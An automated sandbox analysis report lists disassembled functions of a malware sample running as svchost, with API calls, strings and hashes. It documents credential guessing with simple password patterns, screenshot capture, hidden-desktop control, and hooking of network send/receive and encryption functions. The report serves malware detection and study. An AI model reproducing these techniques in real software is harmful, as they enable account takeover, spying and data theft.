                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CACF0B
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CACF41
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CACF80
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB,?,?), ref: 02CACFC7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C41FB$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                              • API String ID: 2545201083-3597230059
                                                                                                                                                                                                              • Opcode ID: a9eb28be36fe5842f324b46e494e761a3b4b0cd2d50246b514417fba265c4a35
                                                                                                                                                                                                              • Instruction ID: 30c6155c71a7b47bdbaf36d99a9c845a6f82bfd206eb526c84a6aa988a25598a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9eb28be36fe5842f324b46e494e761a3b4b0cd2d50246b514417fba265c4a35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0151083190524A8FCF15CB24D868BEABBE5EF89304F5486D6D4CAC7201DB71DB88CB90
                                                                                                                                                                                                              Function 02C98320 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,02C98212,00000000,00000000), ref: 02C98343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,02C98212,00000000,00000000), ref: 02C9834F
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: GetTickCount.KERNEL32 ref: 02C9DA2D
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02C9DA3E
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CDF5A0), ref: 02C9DA6A
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DA83
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C9DAB0
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9DAC3
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: CreateMutexA.KERNEL32(00000000,00000000,02CDF670), ref: 02C9DAE1
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C9DAFF
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02C9DB20
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: SetNamedSecurityInfoA.ADVAPI32(02CDF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02C9DB3D
                                                                                                                                                                                                                • Part of subcall function 02C9DA20: LocalFree.KERNEL32(00000000), ref: 02C9DB47
                                                                                                                                                                                                                • Part of subcall function 02C9DC50: memset.MSVCRT ref: 02C9DC69
                                                                                                                                                                                                                • Part of subcall function 02C9DC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C9DC82
                                                                                                                                                                                                                • Part of subcall function 02CB9F50: malloc.MSVCRT ref: 02CB9F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C983E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C983F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C983FF
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C984A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C984B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C984E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C984EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C984FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02C98506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 02C9854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: SYSTEM!818225!C1B4E9D4$fuck
                                                                                                                                                                                                              • API String ID: 379441473-3112549398
                                                                                                                                                                                                              • Opcode ID: 3b9242ab726cacff2309087f073cb79b06947f9381249dc1089c5b14262eb757
                                                                                                                                                                                                              • Instruction ID: e675ca088fe07e160447197435d1854fd1cb47548a744db9b08a9ef2a9d27e2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b9242ab726cacff2309087f073cb79b06947f9381249dc1089c5b14262eb757
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5751E3B5981341AFEB10EF64E84CFA63BE9BB85314F054BA9E5598F291C770E814CF60
                                                                                                                                                                                                              Function 02CB3340 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94), ref: 02CB3367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB33A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB33B5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB33B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB33CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB33D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3408
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3424
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB3452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB3468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              • API String ID: 224938940-1670482240
                                                                                                                                                                                                              • Opcode ID: c3fe826a259e519235b085dc25c9fb60bd02168ac4b4cb9b65d999a3d427e66d
                                                                                                                                                                                                              • Instruction ID: 5228b42678af60aad6804acc94938f11d3916f39a680a21e7839cb20a23ae5c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3fe826a259e519235b085dc25c9fb60bd02168ac4b4cb9b65d999a3d427e66d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12314731D442585BCB12DB789C58BEBBBE8EF95340F8449D4E989D3140DFB0DA85CBA0
                                                                                                                                                                                                              Function 02CB31C0 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB31EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB31FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB3211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3080,00000000,00000000,00000000), ref: 02CB3234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02CB3245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 505831200-3894408006
                                                                                                                                                                                                              • Opcode ID: 00ab7061d77b1c65b1c5d32b292e77a6415fcb281a688fbd1d8395eee7e0fd15
                                                                                                                                                                                                              • Instruction ID: a73dd6289482c42b734a433357b03e41b75f7389bae444ad82dffbf9cdb25ba7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00ab7061d77b1c65b1c5d32b292e77a6415fcb281a688fbd1d8395eee7e0fd15
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D113830AC6792BBF21267609C0EF5F779CAF44B51F404254FA11E30C1DBF09A0486A7
                                                                                                                                                                                                              Function 02C9A250 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C9A25E
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                                • Part of subcall function 02C9E250: GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C9A29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C9A325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C9A34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C9A391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C9A3E5
                                                                                                                                                                                                                • Part of subcall function 02C9A100: GetTickCount.KERNEL32 ref: 02C9A18A
                                                                                                                                                                                                                • Part of subcall function 02C9A100: GetClassLongA.USER32(00000000,000000E6), ref: 02C9A1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C9A44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C9A479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C9A4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 02C9A514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C9A538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9A5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C9A5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C9A5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C9A5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C9A633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9A65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              • Opcode ID: f3352b05c85947145171046abac398fd509d43e3a1f2e547ae4cf68336f675e3
                                                                                                                                                                                                              • Instruction ID: 110fe6b4315ef600bbf0bacfc4055ac895ddb4bf349a6200310ada6982562360
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3352b05c85947145171046abac398fd509d43e3a1f2e547ae4cf68336f675e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1B15732F402146AEF209A19E88CFBE7358E7C2755F10412AFD09EB181C769D961D7E2
                                                                                                                                                                                                              Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7604DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7604DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              Function 02C99020 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,74DEF590,74DE16B0,?), ref: 02C9902F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02C99037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C99048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02C99059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C99070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C990B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C990C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C990C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02C990CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C99129
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C99142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C9915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02C99194
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 188880187-3887548279
                                                                                                                                                                                                              • Opcode ID: 9a980bb977ec8a625aacea01053f1f124ae71f6360ad42cf7df7287852b68b12
                                                                                                                                                                                                              • Instruction ID: 561a1fe657e5950eefe980ed69278b5ac675f4ce103b71e3d05b2239c4c468b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a980bb977ec8a625aacea01053f1f124ae71f6360ad42cf7df7287852b68b12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A416C71E82204AFDB10DFA8D889BEA7BF8FB49310F544669E508EB380D7705911CBA0
                                                                                                                                                                                                              Function 02CA9820 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,74DEF550,74DEDF10,02CA598B), ref: 02CA9831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02CA9843
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA578
                                                                                                                                                                                                                • Part of subcall function 02CAA540: memcpy.MSVCRT ref: 02CAA5A0
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualProtect.KERNEL32(00000000,?,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA635
                                                                                                                                                                                                                • Part of subcall function 02CAA540: VirtualProtect.KERNEL32(?,00000000,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02CA9862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 02CA9870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02CA988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02CA98A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 02CA98C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
